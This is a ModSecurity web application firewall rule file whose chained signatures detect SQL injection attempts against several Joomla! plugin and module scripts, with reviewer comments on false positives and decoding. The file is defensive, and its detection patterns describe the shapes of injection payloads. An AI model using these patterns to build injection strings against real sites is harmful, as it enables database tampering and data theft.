# (2005392) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- example.php DELETE
SecRule REQUEST_LINE "@contains /plugins/user/example.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005392,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- example.php DELETE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/459203/100/0/threaded'"
    SecRule QUERY_STRING|REQUEST_BODY "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- example.php DELETE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"
# (2005394) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- example.php ASCII
SecRule REQUEST_LINE "@contains /plugins/user/example.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005394,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- example.php ASCII',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/459203/100/0/threaded'"
    SecRule QUERY_STRING|REQUEST_BODY "(?i:ASCII\(.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- example.php ASCII',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"
# (2005395) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! 
SQL Injection Attempt -- example.php UPDATE
# Review notes for rules 2005395-2005401 (Joomla! plugins/user/example.php and
# gmail.php SQL injection signatures):
# - Each signature is a two-link chain; the starter matches the script name as
#   a substring of REQUEST_LINE, which includes the query string.
# - The second link tests the whole QUERY_STRING and REQUEST_BODY rather than a
#   named argument. Patterns such as UPDATE.+SET match any request that has
#   both words in that order anywhere in those strings, so review false
#   positives before enforcing.
# - NOTE(review): the t: actions are listed only on the chain starter, and
#   QUERY_STRING/REQUEST_BODY are presumably still URL-encoded when the second
#   link runs; confirm the transformations in effect for it.
# - 'block' leaves the disruptive action to the SecDefaultAction in force;
#   every match adds tx.critical_anomaly_score to tx.anomaly_score.
SecRule REQUEST_LINE "@contains /plugins/user/example.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005395,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- example.php UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/459203/100/0/threaded'"
    SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- example.php UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"
# (2005396) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- gmail.php SELECT
SecRule REQUEST_LINE "@contains /gmail.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005396,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- gmail.php SELECT',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/459203/100/0/threaded'"
    SecRule QUERY_STRING|REQUEST_BODY "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- gmail.php SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"
# (2005397) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- gmail.php UNION SELECT
SecRule REQUEST_LINE "@contains /gmail.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005397,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- gmail.php UNION SELECT',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/459203/100/0/threaded'"
    SecRule QUERY_STRING|REQUEST_BODY "(?i:UNION\s+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- gmail.php UNION SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"
# (2005398) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- gmail.php INSERT
SecRule REQUEST_LINE "@contains /gmail.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005398,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- gmail.php INSERT',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/459203/100/0/threaded'"
    SecRule QUERY_STRING|REQUEST_BODY "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- gmail.php INSERT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"
# (2005399) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- gmail.php DELETE
SecRule REQUEST_LINE "@contains /gmail.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005399,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- gmail.php DELETE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/459203/100/0/threaded'"
    SecRule QUERY_STRING|REQUEST_BODY "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- gmail.php DELETE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"
# (2005400) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- gmail.php ASCII
SecRule REQUEST_LINE "@contains /gmail.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005400,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- gmail.php ASCII',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/459203/100/0/threaded'"
    SecRule QUERY_STRING|REQUEST_BODY "(?i:ASCII\(.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- gmail.php ASCII',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"
# (2005401) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- gmail.php UPDATE
SecRule REQUEST_LINE "@contains /gmail.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005401,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- gmail.php UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/459203/100/0/threaded'"
    SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- gmail.php UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"
# (2005402) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! 
SQL Injection Attempt -- example.php SELECT SecRule REQUEST_LINE "@contains /example.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005402,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- example.php SELECT',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/459203/100/0/threaded'" SecRule QUERY_STRING|REQUEST_BODY "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- example.php SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005403) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- example.php UNION SELECT SecRule REQUEST_LINE "@contains /example.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005403,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- example.php UNION SELECT',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/459203/100/0/threaded'" SecRule QUERY_STRING|REQUEST_BODY "(?i:UNION\s+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- example.php UNION SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005404) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- example.php INSERT SecRule REQUEST_LINE "@contains /example.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005404,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! 
SQL Injection Attempt -- example.php INSERT',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/459203/100/0/threaded'" SecRule QUERY_STRING|REQUEST_BODY "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- example.php INSERT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005405) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- example.php DELETE SecRule REQUEST_LINE "@contains /example.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005405,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- example.php DELETE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/459203/100/0/threaded'" SecRule QUERY_STRING|REQUEST_BODY "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- example.php DELETE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005406) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- example.php ASCII SecRule REQUEST_LINE "@contains /example.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005406,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- example.php ASCII',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/459203/100/0/threaded'" SecRule QUERY_STRING|REQUEST_BODY "(?i:ASCII\(.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! 
SQL Injection Attempt -- example.php ASCII',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005407) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- example.php UPDATE SecRule REQUEST_LINE "@contains /example.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005407,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- example.php UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/459203/100/0/threaded'" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- example.php UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005408) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- ldap.php SELECT SecRule REQUEST_LINE "@contains /plugins/authentication/ldap.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005408,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- ldap.php SELECT',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/459203/100/0/threaded'" SecRule QUERY_STRING|REQUEST_BODY "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- ldap.php SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005409) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! 
SQL Injection Attempt -- ldap.php UNION SELECT
SecRule REQUEST_LINE "@contains /plugins/authentication/ldap.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005409,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- ldap.php UNION SELECT',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/459203/100/0/threaded'"
    SecRule QUERY_STRING|REQUEST_BODY "(?i:UNION\s+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- ldap.php UNION SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

# NOTE(review): in these chains `capture` and logdata:'%{TX.0}' sit on the
# first rule, whose operator is @contains; the chained keyword regex carries no
# `capture` of its own. Presumably TX.0 then holds the matched path text rather
# than the SQL fragment -- verify what an analyst actually sees in the alert.
# `block` defers the disruptive action to SecDefaultAction, so whether a match
# denies the request or only scores it is decided outside this file. Each match
# adds tx.critical_anomaly_score to tx.anomaly_score, consistent with
# severity:'2' (CRITICAL).

# (2005410) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- ldap.php INSERT
SecRule REQUEST_LINE "@contains /plugins/authentication/ldap.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005410,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- ldap.php INSERT',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/459203/100/0/threaded'"
    SecRule QUERY_STRING|REQUEST_BODY "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- ldap.php INSERT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

# (2005411) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- ldap.php DELETE
SecRule REQUEST_LINE "@contains /plugins/authentication/ldap.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005411,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! 
SQL Injection Attempt -- ldap.php DELETE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/459203/100/0/threaded'" SecRule QUERY_STRING|REQUEST_BODY "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- ldap.php DELETE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005412) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- ldap.php ASCII SecRule REQUEST_LINE "@contains /plugins/authentication/ldap.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005412,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- ldap.php ASCII',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/459203/100/0/threaded'" SecRule QUERY_STRING|REQUEST_BODY "(?i:ASCII\(.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- ldap.php ASCII',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005413) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- ldap.php UPDATE SecRule REQUEST_LINE "@contains /plugins/authentication/ldap.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005413,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- ldap.php UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/459203/100/0/threaded'" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! 
SQL Injection Attempt -- ldap.php UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005414) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- menu.php SELECT SecRule REQUEST_LINE "@contains /modules/mod_mainmenu/menu.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005414,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- menu.php SELECT',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/459203/100/0/threaded'" SecRule QUERY_STRING|REQUEST_BODY "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- menu.php SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005415) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- menu.php UNION SELECT SecRule REQUEST_LINE "@contains /modules/mod_mainmenu/menu.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005415,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- menu.php UNION SELECT',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/459203/100/0/threaded'" SecRule QUERY_STRING|REQUEST_BODY "(?i:UNION\s+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- menu.php UNION SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005416) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! 
SQL Injection Attempt -- menu.php INSERT SecRule REQUEST_LINE "@contains /modules/mod_mainmenu/menu.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005416,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- menu.php INSERT',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/459203/100/0/threaded'" SecRule QUERY_STRING|REQUEST_BODY "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- menu.php INSERT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005417) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- menu.php DELETE SecRule REQUEST_LINE "@contains /modules/mod_mainmenu/menu.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005417,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- menu.php DELETE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/459203/100/0/threaded'" SecRule QUERY_STRING|REQUEST_BODY "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- menu.php DELETE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005418) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- menu.php ASCII SecRule REQUEST_LINE "@contains /modules/mod_mainmenu/menu.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005418,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! 
SQL Injection Attempt -- menu.php ASCII',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/459203/100/0/threaded'" SecRule QUERY_STRING|REQUEST_BODY "(?i:ASCII\(.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- menu.php ASCII',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005419) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- menu.php UPDATE SecRule REQUEST_LINE "@contains /modules/mod_mainmenu/menu.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005419,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- menu.php UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/459203/100/0/threaded'" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- menu.php UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005420) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- content.php where SELECT SecRule REQUEST_LINE "@contains /plugins/search/content.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005420,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- content.php where SELECT',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22122'" SecRule ARGS:where "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! 
SQL Injection Attempt -- content.php where SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

# NOTE(review): this family narrows the second step to a single named
# parameter, ARGS:where, instead of the whole QUERY_STRING|REQUEST_BODY.
# Only a parameter named "where" is inspected, so these rules act as a narrow
# virtual patch for /plugins/search/content.php; the same keyword patterns
# elsewhere in the request rely on the generic SQL injection rules being
# enabled.
# The chained rule declares no t: action. Any decoding beyond ModSecurity's own
# argument parsing therefore depends on SecDefaultAction -- TODO confirm.

# (2005421) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- content.php where UNION SELECT
SecRule REQUEST_LINE "@contains /plugins/search/content.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005421,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- content.php where UNION SELECT',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22122'"
    SecRule ARGS:where "(?i:UNION\s+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- content.php where UNION SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

# (2005422) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- content.php where INSERT
SecRule REQUEST_LINE "@contains /plugins/search/content.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005422,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- content.php where INSERT',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22122'"
